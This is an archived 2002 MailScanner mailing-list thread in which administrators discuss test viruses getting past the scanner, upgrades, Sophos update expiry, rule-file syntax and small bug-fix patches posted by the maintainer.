--- > > > > > > > > > > > > > > > > > > > > > > > > ----- Original Message ----- > > > > > > > > From: "Mike Kercher" > > > > > > > > To: > > > > > > > > Sent: Tuesday, September 24, 2002 10:05 AM > > > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect > all > > > > > > > > > of > > > > the > > > > > > > > vulnerabilities. > > > > > > > > > > > > > > > > > > > > > > > > > > > -----Original Message----- > > > > > > > > > From: MailScanner mailing list > > > > [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > > > > > > > Behalf Of Glynn S. Condez > > > > > > > > > Sent: Monday, September 23, 2002 8:58 PM > > > > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > > > > Subject: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, > > > > > > > > > some > > > > > of > > > > > > > the > > > > > > > > > test email that contents a test virus or codes goes through > > > > > > > > > and > > > > the > > > > > > > > > mailscanner doesn't detect the embedded scripts in the > emails. > > > > > > > > > > > > > > > > > > In version 4, is it possible to scan these kinds of viruses > or > > > > code? > > > > > by > > > > > > > > the > > > > > > > > > way I'm using the stable version of mailscanner 3-22.7 with > > > > > > > > > spamassassin2-31. > > > > > > > > > > > > > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > From LISTSERV at JISCMAIL.AC.UK Tue Sep 24 02:10:38 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:45 2006 Subject: MAILSCANNER: webmaster@CROSSPOINTCHINESE.COM left the list Message-ID: <200209240110.CAA19684@magpie.ecs.soton.ac.uk> Tue, 24 Sep 2002 02:10:38 Crosspoint Webmaster has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From glynn at MAKATI.TECHSQUARE.COM Tue Sep 24 07:55:47 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities References: <000301c26388$93d61c60$6401a8c0@jamesdesktop> <018e01c26388$ac0f4860$8201a8c0@proaccessph.com> <002c01c2638e$e9ba4600$2101a8c0@newhonest.com> <025201c26394$fb4507b0$8201a8c0@proaccessph.com> Message-ID: <025801c26397$691e7350$8201a8c0@proaccessph.com> I think its not a new feature coz im using the old mailscanner 3.22.7 before. --- Glynn --- ----- Original Message ----- From: "Glynn S. Condez" To: Sent: Tuesday, September 24, 2002 2:38 PM Subject: Re: Email Vulnerabilities > What is this split message all about? is it a new feature of mailscanner? > > --- Glynn --- > > ----- Original Message ----- > From: "pg" > To: > Sent: Tuesday, September 24, 2002 1:54 PM > Subject: Re: Email Vulnerabilities > > > > Hi, I have the same problem. I think this is a new feature which prohibit > > "Split message" sent from outlook express. This could be quite a problem > if > > we can't recieve "split message" because from time to time we have to > > receive big but splitted emails. Is there anyone who could help? > > > > -Jason > > ----- Original Message ----- > > From: "Glynn S. Condez" > > To: > > Sent: Tuesday, September 24, 2002 1:10 PM > > Subject: Re: Email Vulnerabilities > > > > > > > Yeah, I got three emails coming to my inbox and the emails are very > clear. > > I > > > only got this eicar.com email in my Deleted Items eventhough I haven't > > > deleted. doest the mailscanner sends this to my Deleted Items coz SWEEP > is > > > not working anymore? > > > > > > --- Glynn --- > > > > > > ----- Original Message ----- > > > From: "James Murchison" > > > To: > > > Sent: Tuesday, September 24, 2002 1:09 PM > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > If your not getting the Virus Warning message the Scanner (Sweep) > isn't > > > > working. The {VIRUS} message is probably being generated by the > allowed > > > > files routine. If you have set your e-mail address as the postmaster, > > > > you should receive at least two messages (probably 3) 1 the return > > > > warning 2 the Postmaster warning and 3 the original message stripped. > > > > > > > > KR J. > > > > > > > > -----Original Message----- > > > > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > > > > Behalf Of Glynn S. Condez > > > > Sent: Tuesday, 24 September 2002 2:54 PM > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > Hi guys, I just updated my mailscanner from 3.22-7 to 3.23-1 and what > I > > > > have found out is the speed, its more faster now and the the > > > > vulnerability test from GFI doesn't work anyone. > > > > > > > > One thing I am wondering with, why does this eicar.com gfi test email > > > > goes to my outlook express deleted items with a modified subject > > > > {VIRUS?} eicar.com [1/5] up to [5/5] and theres no warning message in > > > > the body and the attachment is intact with the filename eicar.com. im > > > > just wondering about this. > > > > > > > > Also, I am using Sophos and I got this message in my console "Useful > > > > life of SWEEP has beed exceeded" does the Sophos doesn't work anymore? > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > ----- Original Message ----- > > > > From: "Glynn S. Condez" > > > > To: > > > > Sent: Tuesday, September 24, 2002 10:37 AM > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > Thanks Jeff for the great idea, it seems that there's nothing that > I > > > > > need to reconfigure except for the conf files of mailscanner. > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > ----- Original Message ----- > > > > > From: "Jeff A. Earickson" > > > > > To: > > > > > Sent: Tuesday, September 24, 2002 10:28 AM > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > Hi, > > > > > > I set up my mailscanner directory thus: > > > > > > > > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> > > > > bin-3.23-1/ > > > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ > > > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ > > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> > > > > etc-3.23-1/ > > > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ > > > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ > > > > > > drwxr-xr-x 3 root none 512 May 2 11:52 man/ > > > > > > drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ > > > > > > drwx------ 4 root none 512 May 3 09:38 var/ > > > > > > > > > > > > When a new version of mailscanner comes out, I untar it and move > the > > > > > > > > > > mailscanner/etc and mailscanner/bin directories to etc-[version] > and > > > > > > > > > > bin-[version]. Then I do side-by-side comparisons of the default > > > > > > config versus my setup. When I've carried my config changes into > > > > > > the new etc files, I stop mailscanner, change the symlinks, > restart > > > > > > mailscanner. Virtually no down time. It would be nice if this > kind > > > > > > > > > > of directory versioning was incorporated into the tarfiles for v4 > > > > > > somehow... > > > > > > > > > > > > ** Jeff A. Earickson, Ph.D PHONE: > > > > 207-872-3659 > > > > > > ** Senior UNIX Sysadmin, Information Technology EMAIL: > > > > > jaearick@colby.edu > > > > > > ** Colby College, 4214 Mayflower Hill, FAX: > > > > 207-872-3076 > > > > > > ** Waterville ME, 04901-8842 > > > > > > > > > > > ---------------------------------------------------------------------- > > > > > ---- > > > > > -- > > > > > > > > > > > > On Tue, 24 Sep 2002, Glynn S. Condez wrote: > > > > > > > > > > > > > Date: Tue, 24 Sep 2002 10:18:03 +0800 > > > > > > > From: Glynn S. Condez > > > > > > > Reply-To: MailScanner mailing list > > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > oh by the way, this the first time that I am going to upgrade > the > > > > > > > mailscanner, is it possible if I am going to rename the old > > > > mailscanner > > > > > > > directory and install the new version of mailscanner as > > > > > > > mailscanner? > > > > > > > > > > > > > > or is there anything that I need to be reconfigure? > > > > > > > > > > > > > > Thanks > > > > > > > --- Glynn --- > > > > > > > > > > > > > > ----- Original Message ----- > > > > > > > From: "Glynn S. Condez" > > > > > > > To: > > > > > > > Sent: Tuesday, September 24, 2002 10:02 AM > > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > > This mailing list is great, the response is so fast :) well > > > > > > > > I'll > > > > do > > > > > the > > > > > > > > upgrade, email you guys about the results. > > > > > > > > > > > > > > > > thanks > > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > > > > > > > ----- Original Message ----- > > > > > > > > From: "Mike Kercher" > > > > > > > > To: > > > > > > > > Sent: Tuesday, September 24, 2002 10:05 AM > > > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect > all > > > > > > > > > of > > > > the > > > > > > > > vulnerabilities. > > > > > > > > > > > > > > > > > > > > > > > > > > > -----Original Message----- > > > > > > > > > From: MailScanner mailing list > > > > [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > > > > > > > Behalf Of Glynn S. Condez > > > > > > > > > Sent: Monday, September 23, 2002 8:58 PM > > > > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > > > > Subject: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, > > > > > > > > > some > > > > > of > > > > > > > the > > > > > > > > > test email that contents a test virus or codes goes through > > > > > > > > > and > > > > the > > > > > > > > > mailscanner doesn't detect the embedded scripts in the > emails. > > > > > > > > > > > > > > > > > > In version 4, is it possible to scan these kinds of viruses > or > > > > code? > > > > > by > > > > > > > > the > > > > > > > > > way I'm using the stable version of mailscanner 3-22.7 with > > > > > > > > > spamassassin2-31. > > > > > > > > > > > > > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > From David.Sullivan at BARNET.AC.UK Tue Sep 24 09:32:20 2002 From: David.Sullivan at BARNET.AC.UK (David Sullivan) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities In-Reply-To: <013e01c26386$742897a0$8201a8c0@proaccessph.com> Message-ID: <3D90313E.12815.14927D7D@localhost> On 24 Sep 2002 at 12:54, Glynn S. Condez wrote: > Hi guys, I just updated my mailscanner from 3.22-7 to 3.23-1 and what I have > found out is the speed, its more faster now and the the vulnerability test > from GFI doesn't work anyone. > > One thing I am wondering with, why does this eicar.com gfi test email goes > to my outlook express deleted items with a modified subject {VIRUS?} > eicar.com [1/5] up to [5/5] and theres no warning message in the body and > the attachment is intact with the filename eicar.com. im just wondering > about this. > > Also, I am using Sophos and I got this message in my console "Useful life of > SWEEP has beed exceeded" does the Sophos doesn't work anymore? > Sophos anti-virus must be updated at least every three months either from the file on the CD sent to you or by downloading it from the Sophos website. This message is a warning that your copy of Sophos more than 3 months old and it *will not* detect the latest viruses. See: http://www.sophos.com/support/faqs/ide.html#3.3 3.3. Why doesn't Sophos supply virus identities (IDEs) for versions of Sophos Anti-Virus more than three months old? David. -- David Sullivan IT Services, Barnet College, London David.Sullivan@barnet.ac.uk 020 8275 5036 ============================================================== This communication may contain privileged or confidential information which is for the exclusive use of the intended recipient. If you are not the intended recipient, please note that you may not distribute or use this communication or the information it contains. If this e-mail has reached you in error, please delete it and any attachment. Internet communications are not secure and Barnet College does not accept legal responsibility for the content of this message. Any views or opinions expressed are those of the author and not necessarily those of Barnet College. Please note that Barnet College reserves the right to monitor the source/destinations of all incoming or outgoing e-mail communications. ============================================================== From mailscanner at ecs.soton.ac.uk Tue Sep 24 09:10:32 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: V4 and viruses to delete In-Reply-To: Message-ID: <5.1.0.14.2.20020924084435.04b53210@imap.ecs.soton.ac.uk> At 00:18 24/09/2002, you wrote: >Thanks. I was just trying to reduce the amount of typing in >mailscanner.conf between revs. I had tried this earlier and it doesn't >seem to work which was why I asked. What happens is that it never >deletes the df/qf files from queue and gets stuck in a loop. If you have "Still Deliver Silent Viruses = no", it does indeed loop. Thanks for spotting that. Fortunately the correction is trivial: --- mailscanner.old Mon Sep 23 23:19:30 2002 +++ mailscanner Tue Sep 24 09:17:02 2002 @@ -336,6 +336,7 @@ # Deliver all the cleaned messages # and mark them for deletion $batch->DeliverCleaned(); + $batch->RemoveDeletedMessages(); # Warn all the senders of messages with any non-silent infections $batch->WarnSenders(); > It sends >the postmaster warning and does remain silent for the sender but since >it's still in queue it gets processed over and over. > >-----Original Message----- >From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] >Sent: Monday, September 23, 2002 6:06 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: V4 and viruses to delete > > >At 20:35 23/09/2002, you wrote: > >What would be an example for the rule file for this option to work? > >I assume you're talking about the "Silent Viruses" option. > >You can just give it a space-separated list of virus names, like this: >Silent Viruses = Klez Yaha-E > >If you want to give it the filename of a ruleset, then that file could >contain something like >To *@domain1.com Yaha-E >To *@domain2.com Klez Sircam-A > >This is one of the keywords that I couldn't really think why you might >want to use a ruleset, but didn't see any good reason to stop you if you >wanted to. If you can tell me what you are trying to achieve, that would >help me produce a better example for you. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 09:41:31 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities In-Reply-To: References: <007401c26370$9c672e90$8201a8c0@proaccessph.com> Message-ID: <5.1.0.14.2.20020924093852.066c3ea0@imap.ecs.soton.ac.uk> At 03:28 24/09/2002, you wrote: >It would be nice if this >kind of directory versioning was incorporated into the tarfiles >for v4 somehow... The tar available now includes the version number. I'm intending to continue doing that unless anyone has strong objections or a better idea. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 10:15:42 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: Spam Header Problem In-Reply-To: Message-ID: <5.1.0.14.2.20020924101444.0669cc50@imap.ecs.soton.ac.uk> Can you mail me your mailscanner.conf file please? I would like to check whether you have Spam Checks = no Use SpamAssassin = yes The logic for when to put the header in (and what to put in it) is tortuous to say the least. Hopefully the V4 code will get it right (more of the time!). At 07:18 24/09/2002, you wrote: >I've been playing with version 3-23.1 and have run into a small problem >with the spam header. I turned off spam checking but then get a blank >spam header ie "X-MailScanner-SpamCheck:" no matter what I do. > >I've tried commenting the line out in mailscanner.conf but that generates >a SYSERR. > >-- >Gerry > >"The lyfe so short, the craft so long to learne" Chaucer -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 10:14:00 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: Version 4.00 Spam Action rule file bug?? In-Reply-To: Message-ID: <5.1.0.14.2.20020924101235.04ad6698@imap.ecs.soton.ac.uk> Try this patch for Message.pm. If it solves the problem it'll be in the next V4 release. And can I take this opportunity to thank all of you for helping me debug V4. With about 100 configuration options, it's very hard for me to test *every* combination :-( --- Message.pm.old Tue Sep 24 10:23:21 2002 +++ Message.pm Tue Sep 24 10:23:59 2002 @@ -396,8 +396,9 @@ # Now we are left with deliver, bounce, delete and store. #print STDERR "Archive places are " . join(',', keys %actions) . "\n"; - # Store and deliver over-ride delete - delete $actions{'delete'} if $actions{'store'} || $actions{'deliver'}; + # Store, deliver and forward over-ride delete + delete $actions{'delete'} if $actions{'store'} || $actions{'deliver'} || + $actions{'forward'}; MailScanner::Log::InfoLog("Spam Actions: message %s actions are %s", $this->{id}, join(',', keys %actions)); At 03:50 24/09/2002, you wrote: >If I set spam action to a rule file and set the rule similar to below >To: user@domain.com forward spam@domain.com >It's forwarded > >If I set it to >To: user@domain.com bounce forward spam@domain.com >It bounced and forwarded. > >If I set to >To: user@domain.com bounce delete forward spam@domain.com >Then I get RBL Check ORDB-RBL timed out and was killed, consecutive >failure 1 of 7 at MailScanner/RBLs.pm line 192 On the console and this >in the log >Sep 23 22:40:09 apollo.med.wayne.edu MailScanner[13257]: RBL Check >ORDB-RBL timed out and was killed, consecutive failure 1 of 7 >Amd all I get is the bounce. > >If I set the rule to >To: user@domain.com bounce delete >Then I get a bounce and the deletion as expected. > >If I set to >To: user@domain.com delete forward spam@domain.com >Then the message is just deleted. > >So it almost seems that delete and forward options can't be used >together. > >-=Bobby -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 09:52:03 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities In-Reply-To: <3D90313E.12815.14927D7D@localhost> References: <013e01c26386$742897a0$8201a8c0@proaccessph.com> Message-ID: <5.1.0.14.2.20020924095045.04b47e80@imap.ecs.soton.ac.uk> At 09:32 24/09/2002, you wrote: >Sophos anti-virus must be updated at least every three months either >from the file on the CD sent to you or by downloading it from the >Sophos website. This message is a warning that your copy of Sophos >more than 3 months old and it *will not* detect the latest viruses. > >See: > >http://www.sophos.com/support/faqs/ide.html#3.3 >3.3. Why doesn't Sophos supply virus identities (IDEs) for versions >of Sophos Anti-Virus more than three months old? Partly to save themselves lots of work creating zip files of IDE files all day, and also to ensure that "evaluation" versions really do expire eventually. The evaluation licence is for 30 days, but you can't stretch it beyond 3 months as you can't get updated IDE files after that. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 08:35:05 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: MailScanner 3.x with OpenAntiVirus In-Reply-To: <028101c26355$23f31b60$6701a8c0@matthew> References: <5070000.1032532738@[192.168.50.4]> Message-ID: <5.1.0.14.2.20020924083434.04b3f400@imap.ecs.soton.ac.uk> At 00:01 24/09/2002, you wrote: > >>> http://www.openantivirus.org/latest.php > > >>>VirusSignatures-latest.zip last modified July 1 2002 04:55:00 AM > >This does not look real appealing as the last signature update. This is precisely the reason I've never bothered implementing support for it before. An old virus scanner is worse than no scanner at all. >Matt > > > The following URL describes how to use MailScanner with the > > OpenAntiVirus ScannerDaemon: > > > > > > > > Julian, the patches are essentially the same as the ones I sent you > > in private email a while back. I've added a few scripts and some > > description of the procedure, as you suggested. > > > > -- > > Devin Reade > > -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 09:35:40 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: Version 4.00.0a4 In-Reply-To: References: <5.1.0.14.2.20020923233324.02461520@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020924093459.066c87b0@imap.ecs.soton.ac.uk> At 00:24 24/09/2002, you wrote: >I just noticed this in my maillog. Could this be that the attachment >itself was corrupt or something? The Klez worm generates broken MIME messages most of the time. It will still manage to disinfect them okay, so don't worry too much about this. >Sep 23 18:14:57 redline MailScanner[5355]: Scanning 1 messages, 399117 bytes >Sep 23 18:14:57 redline MailScanner[5355]: Spam Checks: Starting >Premature end of base64 data at >/usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/PerMsgStatus.pm line >1914, line 5212. >Premature end of base64 data at >/usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/PerMsgStatus.pm line >1914, line 5212. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 09:36:43 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: Version 4.00 rules Question In-Reply-To: References: Message-ID: <5.1.0.14.2.20020924093550.066c1830@imap.ecs.soton.ac.uk> At 02:28 24/09/2002, you wrote: >I am trying to implement a rule for different postmasters based on domain >name. Is the format below correct? Looks fine to me. Note that the FromTo: could also be any of the following: ToFrom: fromto tofrom fromto: tofrom: You get the idea... >FromTo: *@domain1.com postmaster@domain1.org >FromTo: *@domain2.com postmaster@domain2.org >FromTo: default postmaster@somewhere.cc -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 09:47:25 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities In-Reply-To: <013e01c26386$742897a0$8201a8c0@proaccessph.com> References: <009f01c26373$572fe260$8201a8c0@proaccessph.com> Message-ID: <5.1.0.14.2.20020924094156.048ef008@imap.ecs.soton.ac.uk> At 05:54 24/09/2002, you wrote: >Hi guys, I just updated my mailscanner from 3.22-7 to 3.23-1 and what I have >found out is the speed, its more faster now Yay! Someone noticed the optimisations I did in 3.22-something in the way of re-ordering all the "if" statements to reduce the number of system calls by 50%. :-) >One thing I am wondering with, why does this eicar.com gfi test email goes >to my outlook express deleted items with a modified subject {VIRUS?} >eicar.com [1/5] up to [5/5] and theres no warning message in the body and >the attachment is intact with the filename eicar.com. im just wondering >about this. Can anyone else corroborate this? V3 should have deleted the entire message in each of those cases. >Also, I am using Sophos and I got this message in my console "Useful life of >SWEEP has beed exceeded" does the Sophos doesn't work anymore? You need to entirely replace Sophos once every 2 to 3 months, as that is how long they provide IDE files for any given version of Sophos. Download the .tar.Z from the website, stick it in /tmp then do cd /tmp /usr/local/MailScanner/bin/Sophos.install *Please* don't try and use Sophos's install script, it makes a bit of a mess of things :( >----- Original Message ----- >From: "Glynn S. Condez" >To: >Sent: Tuesday, September 24, 2002 10:37 AM >Subject: Re: Email Vulnerabilities > > > > Thanks Jeff for the great idea, it seems that there's nothing that I need > > to reconfigure except for the conf files of mailscanner. > > > > > > --- Glynn --- > > > > ----- Original Message ----- > > From: "Jeff A. Earickson" > > To: > > Sent: Tuesday, September 24, 2002 10:28 AM > > Subject: Re: Email Vulnerabilities > > > > > > > Hi, > > > I set up my mailscanner directory thus: > > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> bin-3.23-1/ > > > drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ > > > drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> etc-3.23-1/ > > > drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ > > > drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ > > > drwxr-xr-x 3 root none 512 May 2 11:52 man/ > > > drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ > > > drwx------ 4 root none 512 May 3 09:38 var/ > > > > > > When a new version of mailscanner comes out, I untar it and move the > > > mailscanner/etc and mailscanner/bin directories to etc-[version] > > > and bin-[version]. Then I do side-by-side comparisons of the default > > > config versus my setup. When I've carried my config changes into the > > > new etc files, I stop mailscanner, change the symlinks, restart > > > mailscanner. Virtually no down time. It would be nice if this > > > kind of directory versioning was incorporated into the tarfiles > > > for v4 somehow... > > > > > > ** Jeff A. Earickson, Ph.D PHONE: 207-872-3659 > > > ** Senior UNIX Sysadmin, Information Technology EMAIL: > > jaearick@colby.edu > > > ** Colby College, 4214 Mayflower Hill, FAX: 207-872-3076 > > > ** Waterville ME, 04901-8842 > > > > -------------------------------------------------------------------------- > > -- > > > > > > On Tue, 24 Sep 2002, Glynn S. Condez wrote: > > > > > > > Date: Tue, 24 Sep 2002 10:18:03 +0800 > > > > From: Glynn S. Condez > > > > Reply-To: MailScanner mailing list > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > Subject: Re: Email Vulnerabilities > > > > > > > > oh by the way, this the first time that I am going to upgrade the > > > > mailscanner, is it possible if I am going to rename the old >mailscanner > > > > directory and install the new version of mailscanner as mailscanner? > > > > > > > > or is there anything that I need to be reconfigure? > > > > > > > > Thanks > > > > --- Glynn --- > > > > > > > > ----- Original Message ----- > > > > From: "Glynn S. Condez" > > > > To: > > > > Sent: Tuesday, September 24, 2002 10:02 AM > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > This mailing list is great, the response is so fast :) well I'll >do > > the > > > > > upgrade, email you guys about the results. > > > > > > > > > > thanks > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > ----- Original Message ----- > > > > > From: "Mike Kercher" > > > > > To: > > > > > Sent: Tuesday, September 24, 2002 10:05 AM > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect all of >the > > > > > vulnerabilities. > > > > > > > > > > > > > > > > > > -----Original Message----- > > > > > > From: MailScanner mailing list >[mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > > > > Behalf Of Glynn S. Condez > > > > > > Sent: Monday, September 23, 2002 8:58 PM > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > Subject: Email Vulnerabilities > > > > > > > > > > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, some > > of > > > > the > > > > > > test email that contents a test virus or codes goes through and >the > > > > > > mailscanner doesn't detect the embedded scripts in the emails. > > > > > > > > > > > > In version 4, is it possible to scan these kinds of viruses or >code? > > by > > > > > the > > > > > > way I'm using the stable version of mailscanner 3-22.7 with > > > > > > spamassassin2-31. > > > > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > > > -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 10:06:03 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: 3.23-1 swearing like a pirate... In-Reply-To: Message-ID: <5.1.0.14.2.20020924095711.04ae9628@imap.ecs.soton.ac.uk> At 03:12 24/09/2002, you wrote: >Julian, > I upgraded from 3.22-14 to 3.23-1 this afternoon and my syslog file >looks a wee bit more profane than before. I'm getting a lot of "oh shit" >complaints, eg: You better do this for starters: --- explode.pl.old Tue Sep 24 10:09:32 2002 +++ explode.pl Tue Sep 24 10:09:40 2002 @@ -343,7 +343,7 @@ for ($i=0; $i<@parts; $i++) { ($infectednum=$i),last if $parts[$i]==$infected; } - Log::WarnLog("Oh shit, missed infected entity in message :-( $MsgId"), return + Log::WarnLog("Oh bother, missed infected entity in message :-( $MsgId"), return if $infectednum<0; # Now to actually do something about it... Can you try sending yourself one and confirm whether MailScanner has actually disabled the Microsoft-specific exploit or not. I can't get it to go wrong on my system :-( >Sep 23 16:06:21 emerald sendmail[24027]: [ID 801593 mail.info] >g8NK6Kjg024027: from=, size=124822, class=0, >nrcpts=1, msgid=<20020923200218.UDTX1953.out007.verizon.net@Ffo>, >proto=ESMTP, daemon=MTA, relay=out007pub.verizon.net [206.46.170.107] >Sep 23 16:06:27 emerald mailscanner[27703]: >>> Virus 'W32/Klez-H' found >in file ./g8NK6Kjg024027/HREF.scr >Sep 23 16:06:27 emerald mailscanner[27703]: Detected Microsoft-specific >exploits in g8NK6Kjg024027 >Sep 23 16:06:27 emerald mailscanner[27703]: Found 3 viruses in messages >g8NK6Kjg024027 >Sep 23 16:06:27 emerald mailscanner[27703]: Oh shit, missed infected >entity in message :-( g8NK6Kjg024027 >Sep 23 16:06:27 emerald mailscanner[27703]: Deleted infected messages >g8NK6Kjg024027 > >Version 3.23-1 has coughed up this furball 69 times today for me, versus once >in the previous two weeks with 3.22-14. Que pasa? > >** Jeff A. Earickson, Ph.D PHONE: 207-872-3659 >** Senior UNIX Sysadmin, Information Technology EMAIL: jaearick@colby.edu >** Colby College, 4214 Mayflower Hill, FAX: 207-872-3076 >** Waterville ME, 04901-8842 >---------------------------------------------------------------------------- -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From glynn at MAKATI.TECHSQUARE.COM Tue Sep 24 11:17:44 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities References: <009f01c26373$572fe260$8201a8c0@proaccessph.com> <5.1.0.14.2.20020924094156.048ef008@imap.ecs.soton.ac.uk> Message-ID: <028601c263b3$9f99d570$8201a8c0@proaccessph.com> > >One thing I am wondering with, why does this eicar.com gfi test email goes > >to my outlook express deleted items with a modified subject {VIRUS?} > >eicar.com [1/5] up to [5/5] and theres no warning message in the body and > >the attachment is intact with the filename eicar.com. im just wondering > >about this. > > Can anyone else corroborate this? V3 should have deleted the entire message > in each of those cases. Is there anything that I need to recheck or reconfigure in the mailscanner.conf? --- Glynn --- ----- Original Message ----- From: "Julian 